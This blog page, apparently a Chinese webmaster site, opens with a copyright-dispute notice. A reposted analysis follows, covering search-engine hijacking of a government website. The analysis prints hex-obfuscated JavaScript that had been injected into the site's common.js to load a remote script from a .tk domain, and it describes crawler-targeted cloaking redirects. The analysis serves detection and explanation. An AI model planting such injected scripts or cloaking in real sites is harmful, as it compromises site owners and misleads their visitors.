本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
说我们IIS7站长博客，有一篇博文用了他们的图片。
要求我们给他们一张图片6000元。要不然法院告我们

为避免不必要的麻烦，IIS7站长博客，全站内容图片下架、并积极应诉
博文内容全部不再显示，请需要相关资讯的站长朋友到必应搜索。谢谢！

另祝：版权碰瓷诈骗团伙，早日弃暗投明。

相关新闻：借版权之名、行诈骗之实，周某因犯诈骗罪被判处有期徒刑十一年六个月

叹！百花齐放的时代,渐行渐远!

---

     最近有人出售搜索引擎劫持技术，此技术可迅速提高网站排名，而且不易发现。

     大家可以试下：用百度搜索气枪关键词发现排名靠前的都是gov的站，但是快照内容是气枪网站的相关内容，点击进去也是气枪的网站。

     但是如果通过域名直接访问会发现进入的却是正常的网站，以此推测目标站点肯定被挂上了某种特殊的代码。

     这种手段如果不是有人投诉管理员一般是不会发现的，所以危害性还是很大的。

     发现伪装JS文件，疑似JS手段实现

     直接查看gov目标的源代码，没有发现任何问题，通过FF的插件可以看到，页面通过SCRIPT脚步方式载入了一个。“http://www.xxxx.tk/image.gif”的文件，通过万网的WHOIS居然提示不能查询TK域名，难得的是WHO.IS也依然没有结果，站长工具的WHOIS查询倒是出了结果，可没有任何意义。

     本地PING，发现域名指向的是127.0.0.1，难道问题不在这里？

     在服务器中js/common.js文件中找到了两句问题代码：

     var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];
document.writeln(_$[0]);

     document.writeln(“<script src=http:\/\/www.wzb360.tk\/image.gif><\/script>”);

     第二句就是之前发现的问题代码，但是访问不了。

     第一句加密了，解密之后发现和第二句是同样的代码。

     怀疑是服务器做了特殊处理，只有在bd.gov.cn载入JS形式时才可以访问。

     百度快照蛛丝马迹，黑客偷梁换柱

     从快照中看出百度索引到的页面并不是我们访问时候看到的页面，页面结构是纯CSS组成，并且没有调用外部文件，顶部有一个“保定市人民政府 ”的链接指向了http://www.bd.gov.cn/defaolt.aspx，那么毋庸置疑，能实现这种效果的只有两种方法：

     第一种，在凌晨时间段把假的主页换上去，对于这样的高权重站，百度在晚上是绝对不会休息的，那么每天的0点到3点换上假的主页，不出3天肯定能索引到这个“主页”。

     第二种方法，在主页中做手脚，改动程序判断百度蜘蛛来路IP，送给百度伪造的主页，不过这种方法管理员容易找到痕迹，只是猜测。

方法和原理都知道了，不过最关键的一段跳转代码没有看到，还是有点遗憾，朽木先琢磨琢磨再发表。

     补充：

     之前朽木的浏览器是IE9，看不了全部缓存，现在可以肯定跳转做到了程序里，应该是default.aspx文件中载入了判断脚本，如果来路是百度，并且关键字是“气枪”那么页面就会跳转到他的网站去。

     至于之前发现的伪装JS文件，可能是同一人作为，觉得JS的效果不好，也可能是之前其他的人入侵之后留下的。